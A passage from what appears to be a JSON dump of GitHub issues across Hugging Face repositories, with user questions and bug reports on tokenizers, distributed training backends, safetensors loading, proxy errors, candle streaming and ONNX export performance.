\r\nSo, it should be [[A1, B1], [A2, B2]] to encode as {A1, B1}, {A2, B2}.\r\n\r\nI've also confirmed that the length of the input list for encode_batch keeps increasing with the number of batches.\r\n\r\nSince the guide instructs to input sentence A and sentence B, this is where the confusion arises.\r\nIf I've misunderstood anything, could you help clarify this point so I can understand it better?", "url": "https://github.com/huggingface/tokenizers/issues/1531", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-05-14T08:03:52Z", "updated_at": "2024-06-21T08:20:05Z", "user": "insookim43" }, { "repo": "huggingface/transformers.js", "number": 762, "title": "Options for the \"translation\" pipeline when using Xenova/t5-small", "body": "### Question\n\nThe translation pipeline is [documented](https://huggingface.co/docs/transformers.js/api/pipelines#module_pipelines.TranslationPipeline) to use {src_lang and tgt_lang} options to translate from the src language to the tgt language. However, when using Xenova/t5-small none of the options seem to be used. Instead looking at the demo code it appears that you have to change the pipeline.task field to \"translation_{fromLanguage}_to_{targetLanguage}\" but I can't find a way to normalize the usage of the translation pipeline with different models.\r\n\r\nIs this task pattern documented somewhere or am I missing some other option settings when calling the translation pipeline?\r\n\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/762", "state": "open", "labels": [ "question" ], "created_at": "2024-05-13T21:09:15Z", "updated_at": "2024-05-13T21:09:15Z", "user": "lucapivato" }, { "repo": "huggingface/datasets", "number": 6894, "title": "Better document defaults of to_json", "body": "Better document defaults of `to_json`: the default format is [JSON-Lines](https://jsonlines.org/).\r\n\r\nRelated to:\r\n- #6891 ", "url": "https://github.com/huggingface/datasets/issues/6894", "state": "closed", "labels": [ "documentation" ], "created_at": "2024-05-13T13:30:54Z", "updated_at": "2024-05-16T14:31:27Z", "comments": 0, "user": "albertvillanova" }, { "repo": "huggingface/chat-ui", "number": 1134, "title": "Websearch failed on retrieving from pdf files", "body": "On chat ui I am getting the error as shown in screenshot, on pdf files it always says \"Failed to parse webpage\". I set USE_LOCAL_WEBSEARCH=True in .env.local. can anyone help me.\r\n![Screenshot (1844)](https://github.com/huggingface/chat-ui/assets/28763364/fc815b17-f29f-481e-813a-e2714ebc9ee5)\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1134", "state": "open", "labels": [ "support", "websearch" ], "created_at": "2024-05-13T06:41:08Z", "updated_at": "2024-06-01T09:25:59Z", "comments": 2, "user": "prateekvyas1996" }, { "repo": "huggingface/parler-tts", "number": 47, "title": "Custom pronunciation for words - any thoughts / recommendations about how best to handle them?", "body": "Hello! 
This is a really interesting looking project.\r\n\r\nCurrently there doesn't seem any way that users can help the model correctly pronounce custom words - for instance **JPEG** is something that speakers just need to know is broken down as \"**Jay-Peg**\" rather than **Jay-Pea-Ee-Gee**.\r\n\r\nI appreciate this project is at an early stage but for practical uses, especially with brands and product names often having quirky ways of saying words or inventing completely new words, it's essential to be able to handle their correct pronunciation on some sort of override basis. It's not just brands - plenty of people's names need custom handling and quite a few novel computer words are non-obvious too.\r\n\r\nExamples that cause problems in the current models: **Cillian, Joaquin, Deirdre, Versace, Tag Heuer, Givenchy, gigabytes, RAM, MPEG** etc.\r\n\r\nAre there any suggestions on how best to tackle this?\r\n\r\nI saw there was #33 which uses a normaliser specifically for numbers. Is there something similar for custom words? I suppose perhaps one could drop in a list of custom words and some sort of mapping to the desired pronunciation, applying that as a stage similar to how it handles abbreviations.\r\n\r\nIn espeak backed tools, it's sometimes possible to replace words with custom IPA that replaces the default IPA generated but I believe this model doesn't use IPA for controlling pronunciation. \r\n\r\nGiven the frequently varying pronunciations, I doubt that simply finetuning to include the words would be a viable approach.\r\n\r\nAnyway, would be great to hear what others have to recommend.\r\n\r\n_Incidentally certain mainstream terms also get completely garbled, it seems impossible to get Instagram, Linux or Wikipedia to be spoken properly, but that's more a training data issue and those are mainstream enough that you wouldn't need to cover them via custom overrides._", "url": "https://github.com/huggingface/parler-tts/issues/47", "state": "open", "labels": [], "created_at": "2024-05-12T15:51:05Z", "updated_at": "2025-01-03T08:39:58Z", "user": "nmstoker" }, { "repo": "huggingface/text-generation-inference", "number": 1875, "title": "How to share memory among 2 GPUS for distributed inference?", "body": "# Environment Setup\r\n\r\nRuntime environment:\r\n\r\nTarget: x86_64-unknown-linux-gnu\r\nCargo version: 1.75.0\r\nCommit sha: https://github.com/huggingface/text-generation-inference/commit/c38a7d7ddd9c612e368adec1ef94583be602fc7e\r\nDocker label: sha-6c4496a\r\nKubernetes Cluster deployment\r\n\r\n2 A100 GPU with 80GB RAM\r\n\r\n12 CPU with 32 GB RAM\r\n\r\nTGI version: 2.0.0\r\n\r\nTGI Parameters:\r\nMAX_INPUT_LENGTH: \"8000\"\r\nMAX_TOTAL_TOKENS: \"8512\"\r\nMAX_CONCURRENT_REQUESTS: \"128\"\r\nLOG_LEVEL: \"INFO\"\r\nMAX_BATCH_TOTAL_TOKENS: \"4294967295\"\r\nWAITING_SERVED_RATIO: \"0.3\"\r\nMAX_WAITING_TOKENS: \"0\"\r\nMAX_BATCH_PREFILL_TOKENS: \"32768\"\r\n\r\n\r\n# Question\r\nI am courious about how to optimize distributed inference for LLMs. I see in that in the docs you mention this:\r\n\r\n```\r\n### A note on Shared Memory (shm)\r\n\r\n[`NCCL`](https://docs.nvidia.com/deeplearning/nccl/user-guide/docs/index.html) is a communication framework used by `PyTorch` to do distributed training/inference. 
`text-generation-inference` make use of `NCCL` to enable Tensor Parallelism to dramatically speed up inference for large language models.\r\n\r\nIn order to share data between the different devices of a `NCCL` group, `NCCL` might fall back to using the host memory if peer-to-peer using NVLink or PCI is not possible.\r\n\r\nTo allow the container to use 1G of Shared Memory and support SHM sharing, we add `--shm-size 1g` on the above command.\r\n\r\nIf you are running `text-generation-inference` inside `Kubernetes`. You can also add Shared Memory to the container by creating a volume with:\r\n\r\n\\- name: shm\r\n emptyDir:\r\n medium: Memory\r\n sizeLimit: 1Gi\r\n\r\nand mounting it to `/dev/shm`.\r\n\r\nFinally, you can also disable SHM sharing by using the `NCCL_SHM_DISABLE=1` environment variable. However, note that this will impact performance.\r\n```\r\n\r\nWe currently have this setup with K8s:\r\n```\r\n - name: m\r\n emptyDir:\r\n sizeLimit: 1Gi\r\n medium: Memory\r\n``` \r\n \r\nHowever, I feel like I am missing something. \r\n\r\nSay GPU memory size is G, model weight in megabytes is M and free available memory for processing requests is F.\r\n\r\nThen when I deploy a model with size M (where M < G) with SHARDED=True and over 2 full GPUs(G_1 and G_2). What I expect is the model weights taking M megabytes from GPU1 (G_1) and then the available/free memory, F, for processing tokens/requests should be (G_1 - M) + G_2 = F. Right?\r\n\r\nInstead what I am seeing is that the model is replicated on both GPUs, so F = (G_1 - M) + (G_2 - M) . I believe this is not what we want. For example with Mistral7b:\r\n\r\n| Sharded | GPU 1 | GPU 2 |\r\n| -------- | ----- | ------ |\r\n| False | 66553MiB / 81920MiB 81% used | Does not exist |\r\n| True | 66553MiB / 81920MiB 81% used | 66553MiB / 81920MiB 81% used |\r\n\r\nWe would like to have the model only on 1 GPU (if it fits) and then use the extra available GPUs just for inference, i.e, increasing our memory budget at processing time by sharing the memory between the left over memory from the GPU where the model weights live and the memory from the GPU without model weights.\r\n\r\nThis is what makes me think we are not using NCCL correctly, or maybe my assumptions are wrong, and what I am saying is not possible to do?\r\n\r\n\r\n# Visual description \r\n\r\n![Screenshot 2024-05-10 at 10 46 34](https://github.com/huggingface/text-generation-inference/assets/58919465/93af371c-558a-4852-9d28-804d73ba9df5)\r\n", "url": "https://github.com/huggingface/text-generation-inference/issues/1875", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-05-10T08:49:05Z", "updated_at": "2024-06-21T01:48:05Z", "user": "martinigoyanes" }, { "repo": "huggingface/accelerate", "number": 2759, "title": "How to specify the backend of Trainer", "body": "### System Info\n\n```Shell\naccelerate 0.28.0\n```\n\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nI am running a multi-node, multi-gpu training code on two nodes with one A100-40GB respectively. I don't have the `NCCL` installed on this cluster, so I am trying to use the default `gloo` backend to start training. 
But I didn't find any documents on how to specify backend when `accelerate launch`. Any help will be very appreciated!\r\nHere is my launching script.\r\n```\r\nsrun -N 2 -n 2 -w xgpg2,xgpg3 accelerate launch --config_file /tmp/my_dist_config.yaml --gradient_accumulation_steps 8 --gradient_clipping 1.0 --mixed_precision bf16 train.py ...my training arguments..\r\n```\r\nHere is my accelerate config on each node.\r\n```\r\n# `/tmp/my_dist_config.yaml` on xgpg2\r\ncompute_environment: LOCAL_MACHINE\r\ndebug: false\r\ndistributed_type: MULTI_GPU\r\ndowncast_bf16: 'no'\r\ngpu_ids: all\r\nmachine_rank: 0\r\nmain_process_ip: xgpg2\r\nmain_process_port: 9999\r\nmain_training_function: main\r\nmixed_precision: bf16\r\nnum_machines: 2\r\nnum_processes: 2\r\nrdzv_backend: static\r\nsame_network: true\r\ntpu_env: []\r\ntpu_use_cluster: false\r\ntpu_use_sudo: false\r\nuse_cpu: false\r\n# `/tmp/my_dist_config.yaml` on xgpg3\r\ncompute_environment: LOCAL_MACHINE\r\ndebug: false\r\ndistributed_type: MULTI_GPU\r\ndowncast_bf16: 'no'\r\ngpu_ids: all\r\nmachine_rank: 1\r\nmain_process_ip: xgpg2\r\nmain_process_port: 9999\r\nmain_training_function: main\r\nmixed_precision: bf16\r\nnum_machines: 2\r\nnum_processes: 2\r\nrdzv_backend: static\r\nsame_network: true\r\ntpu_env: []\r\ntpu_use_cluster: false\r\ntpu_use_sudo: false\r\nuse_cpu: false\r\n```\r\nHere is the main body of my training code\r\n```\r\n...\r\ntokenizer = load_tokenizer(model_args.tokenizer_dir, train_mode=model_args.do_train)\r\nmodel = load_model(model_args, quant_config, peft_config)\r\nlogger.info(f\"Model Architecture:\\n{model}\")\r\nprint_trainable_parameters(model)\r\n\r\ntrainer = Trainer(\r\n model=model,\r\n train_dataset=train_data,\r\n eval_dataset=eval_data, \r\n args=trainer_config,\r\n data_collator=PaddToMaxLenCollator(tokenizer, model_args.max_length), \r\n)\r\n\r\n# Training\r\nif model_args.do_train:\r\n train_result = trainer.train(resume_from_checkpoint=model_args.resume_from_checkpoint)\r\n trainer.log_metrics(\"train\", train_result.metrics) \r\n trainer.save_metrics(\"train\", train_result.metrics) \r\n...\r\n```\r\n\r\nI tried to run this directly, but it went into some NCCL error like this:\r\n```\r\ntorch.distributed.DistBackendError: NCCL error in: /opt/conda/conda-bld/pytorch_1704987394225/work/torch/csrc/distributed/c10d/ProcessGroupNCCL.cpp:1691, unhandled system error (run with NCCL_DEBUG=INFO for details), NCCL version 2.19.3\r\n```\r\nI think the NCCL isn't installed on the system by system administrator, but there is a `nccl` library in my conda environment, which could probably be installed as some other library's dependency. I am not familiar with NCCL, but my understanding is this won't work because NCCL should be installed on system level. Am I right?\r\n```\r\n# Name Version Build Channel\r\nnccl 2.21.5.1 h3a97aeb_0 conda-forge\r\n```\n\n### Expected behavior\n\nHope to know how to use the 'gloo' backend for Trainer. 
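One knob that may apply here (a sketch, assuming a transformers version where `TrainingArguments` exposes `ddp_backend`):

```python
from transformers import TrainingArguments

# ddp_backend is forwarded to torch.distributed's init_process_group,
# so "gloo" avoids the NCCL requirement (at a throughput cost on GPUs).
training_args = TrainingArguments(
    output_dir="models/output",
    ddp_backend="gloo",
)
```

Whether the DeepSpeed integration also runs over gloo is a separate question; DeepSpeed exposes a `dist_backend` option in `deepspeed.init_distributed`, but its GPU collectives are primarily built and tested around NCCL.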
And also hope to know if I can use Trainer's Deepspeed Integration with gloo backend", "url": "https://github.com/huggingface/accelerate/issues/2759", "state": "closed", "labels": [], "created_at": "2024-05-10T03:18:08Z", "updated_at": "2025-01-16T10:29:19Z", "user": "Orion-Zheng" }, { "repo": "huggingface/lerobot", "number": 167, "title": "python3.10 how to install rerun-sdk", "body": "### System Info\n\n```Shell\nubuntu18.04\r\npython3.10\r\n\r\n\r\nERROR: Could not find a version that satisfies the requirement rerun-sdk>=0.15.1 (from lerobot) (from versions: none)\r\nERROR: No matching distribution found for rerun-sdk>=0.15.1\n```\n\n\n### Information\n\n- [X] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\npip install .\r\n\r\nERROR: Could not find a version that satisfies the requirement rerun-sdk>=0.15.1 (from lerobot) (from versions: none)\r\nERROR: No matching distribution found for rerun-sdk>=0.15.1\n\n### Expected behavior\n\nI want to know how to solve this problem", "url": "https://github.com/huggingface/lerobot/issues/167", "state": "closed", "labels": [ "dependencies" ], "created_at": "2024-05-10T03:07:30Z", "updated_at": "2024-05-13T01:25:09Z", "user": "MountainIntelligent" }, { "repo": "huggingface/safetensors", "number": 478, "title": "Can't seem to skip parameter initialization while using the `safetensors.torch.load_model` API!", "body": "### System Info\r\n\r\n- `transformers` version: 4.40.0\r\n- Platform: Linux-5.15.0-105-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- Huggingface_hub version: 0.22.2\r\n- Safetensors version: 0.4.1\r\n- Accelerate version: 0.25.0\r\n- Accelerate config: not found\r\n- PyTorch version (GPU?): 2.2.2+cu121 (True)\r\n- Tensorflow version (GPU?): 2.16.1 (True)\r\n- Flax version (CPU?/GPU?/TPU?): 0.8.2 (cpu)\r\n- Jax version: 0.4.26\r\n- JaxLib version: 0.4.21`\r\n\r\n### Reproduction\r\n\r\nIn order to load a serialized model, I use the `safetensors.torch.load_model` API which requires a `torch.nn.Module` type as the first argument. \r\nI create this model while ensuring that the parameters are **not** initialized since they will get overridden anyway. I do this by using the `init_empty_weights` context manager from the `accelerate` package. \r\n```\r\nfrom transformers import LlamaConfig, LlamaForCausalLM\r\nfrom accelerate import init_empty_weights\r\n\r\nconfig = LlamaConfig()\r\nwith init_empty_weights():\r\n model = LlamaForCausalLM(config)\r\nsafetensors.torch.load_model(model, ) //throws an error\r\n```\r\nThe last line throws the error\r\n```\r\n warnings.warn(f'for {key}: copying from a non-meta parameter in the checkpoint to a meta '\r\nUserWarning: for model.norm.weight: copying from a non-meta parameter in the checkpoint to a meta parameter in the current model, which is a no-op. (Did you mean to pass `assign=True` to assign items in the state dictionary to their corresponding key in the module instead of copying them in place?)\r\n```\r\n\r\nTurns out the loading of the state_dict is a no-op which could be resolved by using the `assign=True` argument however the current API doesn't provide a way to set that. Any ideas on how to overcome this issue?\r\n\r\n### Expected behavior\r\n\r\n`load_model` API returns a model object where the state_dict is initialized from the stored checkpoint. 
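A workaround that may apply here (a sketch, assuming PyTorch >= 2.1, where `load_state_dict` accepts `assign=True`, and modulo tied-weight caveats; `model.safetensors` is a placeholder path): skip `load_model` and assign the tensors directly, so the meta parameters are replaced rather than copied into.

```python
import safetensors.torch
from accelerate import init_empty_weights
from transformers import LlamaConfig, LlamaForCausalLM

with init_empty_weights():
    model = LlamaForCausalLM(LlamaConfig())

# assign=True swaps the meta tensors for the checkpoint tensors
# instead of performing an in-place (and here no-op) copy.
state_dict = safetensors.torch.load_file("model.safetensors")
model.load_state_dict(state_dict, assign=True)
```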
", "url": "https://github.com/huggingface/safetensors/issues/478", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-05-09T19:12:05Z", "updated_at": "2024-06-15T01:49:24Z", "comments": 1, "user": "goelayu" }, { "repo": "huggingface/tokenizers", "number": 1525, "title": "How to write custom Wordpiece class?", "body": "My aim is get the rwkv5 model\u2018s \"tokenizer.json\",but it implemented through slow tokenizer(class Pretrainedtokenizer).\r\nI want to convert \"slow tokenizer\" to \"fast tokenizer\",it needs to use \"tokenizer = Tokenizer(Wordpiece())\",but rwkv5 has it\u2018s own Wordpiece file.\r\nSo I want to create a custom Wordpiece\r\n\r\nthe code is here\r\n\r\n```python\r\n\r\nfrom tokenizers.models import Model\r\nclass MyWordpiece(Model):\r\n def __init__(self,vocab,unk_token):\r\n self.vocab = vocab\r\n self.unk_token = unk_token\r\n\r\n\r\n\r\ntest = MyWordpiece('./vocab.txt',\"\")\r\n\r\n```\r\n\r\n```\r\nTraceback (most recent call last):\r\n File \"test.py\", line 78, in \r\n test = MyWordpiece('./vocab.txt',\"\")\r\nTypeError: Model.__new__() takes 0 positional arguments but 2 were given\r\n```", "url": "https://github.com/huggingface/tokenizers/issues/1525", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-05-09T03:48:27Z", "updated_at": "2024-07-18T01:53:23Z", "user": "xinyinan9527" }, { "repo": "huggingface/trl", "number": 1635, "title": "How to use trl\\trainer\\kto_trainer.py", "body": "If I want to use KTO trainer, I could set the parameter [loss_type == \"kto_pair\"] in dpo_trainer.py. Then what is kto_trainer.py used for? And how to use it? ", "url": "https://github.com/huggingface/trl/issues/1635", "state": "closed", "labels": [], "created_at": "2024-05-09T02:40:14Z", "updated_at": "2024-06-11T10:17:51Z", "user": "mazhengyufreedom" }, { "repo": "huggingface/datasets", "number": 6882, "title": "Connection Error When Using By-pass Proxies", "body": "### Describe the bug\n\nI'm currently using Clash for Windows as my proxy tunnel, after exporting HTTP_PROXY and HTTPS_PROXY to the port that clash provides\ud83e\udd14, it runs into a connection error saying \"Couldn't reach https://raw.githubusercontent.com/huggingface/datasets/2.19.1/metrics/seqeval/seqeval.py (ConnectionError(MaxRetryError(\"HTTPSConnectionPool(host='raw.githubusercontent.com', port=443): Max retries exceeded with url: /huggingface/datasets/2.19.1/metrics/seqeval/seqeval.py (Caused by NewConnectionError(': Failed to establish a new connection: [Errno 111] Connection refused'))\")))\"\r\nI have already read the documentation provided on the hugginface, but I think I didn't see the detailed instruction on how to set up proxies for this library.\n\n### Steps to reproduce the bug\n\n1. Turn on any proxy software like Clash / ShadosocksR etc.\r\n2. export system varibles to the port provided by your proxy software in wsl (It's ok for other applications to use proxy expect dataset-library)\r\n3. 
load any dataset from hugginface online\n\n### Expected behavior\n\n---------------------------------------------------------------------------\r\nConnectionError Traceback (most recent call last)\r\nCell In[33], [line 3](vscode-notebook-cell:?execution_count=33&line=3)\r\n [1](vscode-notebook-cell:?execution_count=33&line=1) from datasets import load_metric\r\n----> [3](vscode-notebook-cell:?execution_count=33&line=3) metric = load_metric(\"seqeval\")\r\n\r\nFile ~/.local/lib/python3.10/site-packages/datasets/utils/deprecation_utils.py:46, in deprecated..decorator..wrapper(*args, **kwargs)\r\n [44](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/utils/deprecation_utils.py:44) warnings.warn(warning_msg, category=FutureWarning, stacklevel=2)\r\n [45](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/utils/deprecation_utils.py:45) _emitted_deprecation_warnings.add(func_hash)\r\n---> [46](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/utils/deprecation_utils.py:46) return deprecated_function(*args, **kwargs)\r\n\r\nFile ~/.local/lib/python3.10/site-packages/datasets/load.py:2104, in load_metric(path, config_name, process_id, num_process, cache_dir, experiment_id, keep_in_memory, download_config, download_mode, revision, trust_remote_code, **metric_init_kwargs)\r\n [2101](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/load.py:2101) warnings.filterwarnings(\"ignore\", message=\".*https://huggingface.co/docs/evaluate$\", category=FutureWarning)\r\n [2103](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/load.py:2103) download_mode = DownloadMode(download_mode or DownloadMode.REUSE_DATASET_IF_EXISTS)\r\n-> [2104](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/load.py:2104) metric_module = metric_module_factory(\r\n [2105](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/load.py:2105) path,\r\n [2106](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/load.py:2106) revision=revision,\r\n [2107](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/load.py:2107) download_config=download_config,\r\n [2108](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/load.py:2108) download_mode=download_mode,\r\n 
[2109](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/load.py:2109) trust_remote_code=trust_remote_code,\r\n [2110](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/load.py:2110) ).module_path\r\n [2111](https://vscode-remote+wsl-002bubuntu-002d22-00", "url": "https://github.com/huggingface/datasets/issues/6882", "state": "open", "labels": [], "created_at": "2024-05-08T06:40:14Z", "updated_at": "2024-05-17T06:38:30Z", "comments": 1, "user": "MRNOBODY-ZST" }, { "repo": "huggingface/datatrove", "number": 180, "title": "how to turn log/traceback color off?", "body": "Trying datatrove for the first time and the program spews a bunch of logs and tracebacks in yellow and cyan which are completely unreadable on the b&w console. \r\n\r\nDoes the program make an assumption that the user is using w&b (dark) console?\r\n\r\nI tried to grep for `color` to see how it controls the colors but found nothing relevant, so it's probably some 3rd party component that does that.\r\n\r\nIf the coloring logic doesn't bother to check what the console colors are to keep the output readable, any idea how to turn it off completely? I RTFM'ed - didn't find any docs that address that aspect.\r\n\r\nThanks a lot!", "url": "https://github.com/huggingface/datatrove/issues/180", "state": "closed", "labels": [], "created_at": "2024-05-08T03:51:11Z", "updated_at": "2024-05-17T17:53:20Z", "user": "stas00" }, { "repo": "huggingface/candle", "number": 2171, "title": "How to run LLama-3 or Phi with more then 4096 prompt tokens?", "body": "Could you please show me an example where LLama-3 model used (better GGUF quantized) and initial prompt is more then 4096 tokens long? Or better 16-64K long (for RAG). Currently everything I do ends with error:\r\nIn this code:\r\nlet logits = model.forward(&input, 0); // input is > 4096 tokens\r\n\r\nError:\r\nnarrow invalid args start + len > dim_len: [4096, 64], dim: 0, start: 0, len:4240\r\n\r\nModel used:\r\nhttps://huggingface.co/MaziyarPanahi/Llama-3-8B-Instruct-64k-GGUF\r\n\r\nThank you a lot in advance!", "url": "https://github.com/huggingface/candle/issues/2171", "state": "open", "labels": [], "created_at": "2024-05-07T20:15:28Z", "updated_at": "2024-05-07T20:16:13Z", "user": "baleksey" }, { "repo": "huggingface/chat-ui", "number": 1115, "title": "[v0.8.4] IMPORTANT: Talking to PDFs and general Roadmap?", "body": "Hi @nsarrazin \r\n\r\nI have a couple of questions that I could not get answers to in the repo and on the web.\r\n\r\n1. Is there a plan to enable file uploads (PDFs, etc) so that users can talk to those files? Similar to ChatGPT, Gemini etc? \r\n2. 
Is there a feature roadmap available somewhere?\r\n\r\nThanks!", "url": "https://github.com/huggingface/chat-ui/issues/1115", "state": "open", "labels": [], "created_at": "2024-05-07T06:10:20Z", "updated_at": "2024-09-10T15:44:16Z", "comments": 4, "user": "adhishthite" }, { "repo": "huggingface/candle", "number": 2167, "title": "How to do a Axum's sse function for Candle?", "body": "fn run(&mut self, prompt: &str, sample_len: usize) -> Result<()> {\r\n use std::io::Write;\r\n self.tokenizer.clear();\r\n let mut tokens = self\r\n .tokenizer\r\n .tokenizer()\r\n .encode(prompt, true)\r\n .map_err(E::msg)?\r\n .get_ids()\r\n .to_vec();\r\n for &t in tokens.iter() {\r\n if let Some(t) = self.tokenizer.next_token(t)? {\r\n print!(\"{t}\")\r\n }\r\n }\r\n std::io::stdout().flush()?;\r\n\r\n let mut generated_tokens = 0usize;\r\n let eos_token = match self.tokenizer.get_token(\"<|endoftext|>\") {\r\n Some(token) => token,\r\n None => anyhow::bail!(\"cannot find the <|endoftext|> token\"),\r\n };\r\n let start_gen = std::time::Instant::now();\r\n for index in 0..sample_len {\r\n let context_size = if index > 0 { 1 } else { tokens.len() };\r\n let start_pos = tokens.len().saturating_sub(context_size);\r\n let ctxt = &tokens[start_pos..];\r\n let input = Tensor::new(ctxt, &self.device)?.unsqueeze(0)?;\r\n let logits = self.model.forward(&input, start_pos)?;\r\n let logits = logits.squeeze(0)?.squeeze(0)?.to_dtype(DType::F32)?;\r\n let logits = if self.repeat_penalty == 1. {\r\n logits\r\n } else {\r\n let start_at = tokens.len().saturating_sub(self.repeat_last_n);\r\n candle_transformers::utils::apply_repeat_penalty(\r\n &logits,\r\n self.repeat_penalty,\r\n &tokens[start_at..],\r\n )?\r\n };\r\n\r\n let next_token = self.logits_processor.sample(&logits)?;\r\n tokens.push(next_token);\r\n generated_tokens += 1;\r\n if next_token == eos_token {\r\n break;\r\n }\r\n if let Some(t) = self.tokenizer.next_token(next_token)? {\r\n print!(\"{t}\");\r\n std::io::stdout().flush()?;\r\n }\r\n }\r\n let dt = start_gen.elapsed();\r\n if let Some(rest) = self.tokenizer.decode_rest().map_err(E::msg)? {\r\n print!(\"{rest}\");\r\n }\r\n std::io::stdout().flush()?;\r\n println!(\r\n \"\\n{generated_tokens} tokens generated ({:.2} token/s)\",\r\n generated_tokens as f64 / dt.as_secs_f64(),\r\n );\r\n Ok(())\r\n }\r\n\r\n\r\nHow to rewrite above function to sse?", "url": "https://github.com/huggingface/candle/issues/2167", "state": "closed", "labels": [], "created_at": "2024-05-07T02:38:50Z", "updated_at": "2024-05-08T04:27:14Z", "user": "sunnyregion" }, { "repo": "huggingface/optimum", "number": 1847, "title": "Static Quantization for Seq2Seq models like T5", "body": "I'm currently trying to static quantize T5 but it seem in the optimum doc last committed 10 months ago said it don't support static only dynamic. Is there anyone ever try this before or has optimum updated any related recently, may be help me take a look?", "url": "https://github.com/huggingface/optimum/issues/1847", "state": "open", "labels": [ "question", "quantization" ], "created_at": "2024-05-06T19:34:30Z", "updated_at": "2024-10-14T12:24:28Z", "user": "NQTri00" }, { "repo": "huggingface/optimum", "number": 1846, "title": "Low performance of THUDM/chatglm3-6b onnx model", "body": "I ran the chatglm3-6b model by exporting it to ONNX framework using custom onnx configuration. Although the functionality is correct, the latency of the model is very high, much higher than the pytorch model. 
\r\nI have attached a minimal reproducible code which exports and run the model. Can someone take a look into it and suggest how to rectify the performance degradation.\r\n\r\n```\r\nfrom optimum.exporters.onnx import main_export\r\nfrom transformers import AutoConfig\r\n\r\nfrom optimum.exporters.onnx.config import TextDecoderOnnxConfig,TextDecoderWithPositionIdsOnnxConfig\r\nfrom optimum.exporters.onnx.base import ConfigBehavior\r\nfrom optimum.utils import NormalizedTextConfig, DummyPastKeyValuesGenerator\r\nfrom typing import Dict\r\nimport os\r\nimport shutil\r\nimport time\r\n\r\n\r\nclass ChatGLM2DummyPastKeyValuesGenerator(DummyPastKeyValuesGenerator):\r\n\r\n def generate(self, input_name: str, framework: str = \"pt\"):\r\n past_key_shape = (\r\n self.batch_size,\r\n self.num_attention_heads,\r\n self.hidden_size // self.num_attention_heads,\r\n self.sequence_length,\r\n )\r\n past_value_shape = (\r\n self.batch_size,\r\n self.num_attention_heads,\r\n self.sequence_length,\r\n self.hidden_size // self.num_attention_heads,\r\n )\r\n return [\r\n (\r\n self.random_float_tensor(past_key_shape, framework=framework),\r\n self.random_float_tensor(past_value_shape, framework=framework),\r\n )\r\n for _ in range(self.num_layers)\r\n ]\r\n\r\n\r\nclass CustomChatGLM2OnnxConfig(TextDecoderOnnxConfig):\r\n DUMMY_INPUT_GENERATOR_CLASSES = (\r\n ChatGLM2DummyPastKeyValuesGenerator,\r\n ) + TextDecoderOnnxConfig.DUMMY_INPUT_GENERATOR_CLASSES\r\n DUMMY_PKV_GENERATOR_CLASS = ChatGLM2DummyPastKeyValuesGenerator\r\n\r\n DEFAULT_ONNX_OPSET = 15 # aten::tril operator requires opset>=14\r\n NORMALIZED_CONFIG_CLASS = NormalizedTextConfig.with_args(\r\n hidden_size=\"hidden_size\",\r\n num_layers=\"num_layers\",\r\n num_attention_heads=\"num_attention_heads\",\r\n )\r\n\r\n def add_past_key_values(\r\n self, inputs_or_outputs: Dict[str, Dict[int, str]], direction: str\r\n ):\r\n\r\n if direction not in [\"inputs\", \"outputs\"]:\r\n raise ValueError(\r\n f'direction must either be \"inputs\" or \"outputs\", but {direction} was given'\r\n )\r\n\r\n if direction == \"inputs\":\r\n decoder_sequence_name = \"past_sequence_length\"\r\n name = \"past_key_values\"\r\n else:\r\n decoder_sequence_name = \"past_sequence_length + 1\"\r\n name = \"present\"\r\n\r\n for i in range(self._normalized_config.num_layers):\r\n inputs_or_outputs[f\"{name}.{i}.key\"] = {\r\n 0: \"batch_size\",\r\n 3: decoder_sequence_name,\r\n }\r\n inputs_or_outputs[f\"{name}.{i}.value\"] = {\r\n 0: \"batch_size\",\r\n 2: 